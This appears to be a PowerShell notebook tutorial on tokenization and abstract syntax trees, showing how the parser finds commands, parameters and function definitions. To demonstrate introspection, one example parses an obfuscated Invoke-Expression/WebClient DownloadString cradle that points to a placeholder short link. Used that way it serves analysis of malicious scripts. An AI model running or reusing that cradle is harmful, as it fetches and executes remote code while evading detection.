## The AST
PowerShell interprets text input by splitting it into _tokens_, based on words and delimiting symbols (quotes for example). These tokens are then arranged into an _abstract syntax tree_ - a sort of dynamic data structure that gives meaning to the tokens when considered as a whole. An AST allows for words to be identified as commands and words following commands as parameters to that command.

In [9]:
$code = { Get-Command -ParameterType String | Select-Object -First 10 }

# the PSParser is the old PowerShell parser, but it is still useful for examining how PowerShell performs tokenization
$tokens = [System.Management.Automation.PSParser]::Tokenize($code, [ref]$null)
$tokens[0..3]


Content     : Get-Command
Type        : Command
Start       : 1
Length      : 11
StartLine   : 1
StartColumn : 2
EndLine     : 1
EndColumn   : 13

Content     : -ParameterType
Type        : CommandParameter
Start       : 13
Length      : 14
StartLine   : 1
StartColumn : 14
EndLine     : 1
EndColumn   : 28

Content     : String
Type        : CommandArgument
Start       : 28
Length      : 6
StartLine   : 1
StartColumn : 29
EndLine     : 1
EndColumn   : 35

Content     : |
Type        : Operator
Start       : 35
Length      : 1
StartLine   : 1
StartColumn : 36
EndLine     : 1
EndColumn   : 37



The AST of a scriptblock is itself an object of the type AST, with components of the AST being sub-objects of types that inherit from the AST class. For example, CommandAST objects contain the command sections of the AST.

In [ ]:
#  The PowerShell AST parser can be called directly on a piece of code, and the resulting AST structure can be examined
$code = { Get-Command -ParameterType String | Select-Object -First 10 }
# the FindAll() method of the AST class takes a function which it uses to match against objects in the AST
"===== Commands ====="
$code.AST.FindAll({$args[0] -is [System.Management.Automation.Language.CommandAst]},1)
"===== Parameters ====="
$code.AST.FindAll({$args[0] -is [System.Management.Automation.Language.CommandParameterAst]},1)

The power of the AST comes in how it enabled deep introspection of PowerShell code. For example, pulling the cmdlets out of this obfuscated string:

In [8]:
$code = {
    Invoke-Expression (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( 'ht'+'tps://' + 'bit.ly/sample')
}
$AST = [System.Management.Automation.Language.Parser]::ParseInput($code, [ref]$null, [ref]$null)
$AST.FindAll(
    { $args[0] -is [System.Management.Automation.Language.CommandAst] }, $true) | ForEach {
    $_.CommandElements
} | Format-Table -AutoSize


StringConstantType Value             StaticType    Extent
------------------ -----             ----------    ------                                          
          BareWord Invoke-Expression System.String Invoke-Expression                               
                                     System.Object (& (`G`C`M *w-O*) "`N`e`T`.`W`e`B`C`l`i`e`N`T")…
                                     System.Object (`G`C`M *w-O*)                                  
      DoubleQuoted NT.WBCliNT     System.String "`N`e`T`.`W`e`B`C`l`i`e`N`T"                    
          BareWord GCM               System.String `G`C`M                                          
          BareWord *w-O*             System.String *w-O*                                           



Although realistically, this is better achieved by reviewing PowerShells scriptblock logs. A more practical example use case is using the AST to retrieve all the function definitions within a script:

In [15]:
$code = {
    function TestFunc {
        param(
            [Parameter(Mandatory = $true, Position = 1, HelpMessage = "The message to write")]
            [string]$Message
        )

        process {
            Write-Host "Message: $message"
        }
    }
}
$AST = [System.Management.Automation.Language.Parser]::ParseInput($code, [ref]$null, [ref]$null)
$AST.FindAll({$args[0] -is [System.Management.Automation.Language.FunctionDefinitionAst]}, $true) | 
    Select Name, Body | Format-List


Name : TestFunc
Body : {
               param(
                   [Parameter(Mandatory = $true, Position = 1, HelpMessage = "The message to 
       write")]
                   [string]$Message
               )
       
               process {
                   Write-Host "Message: $message"
               }
           }

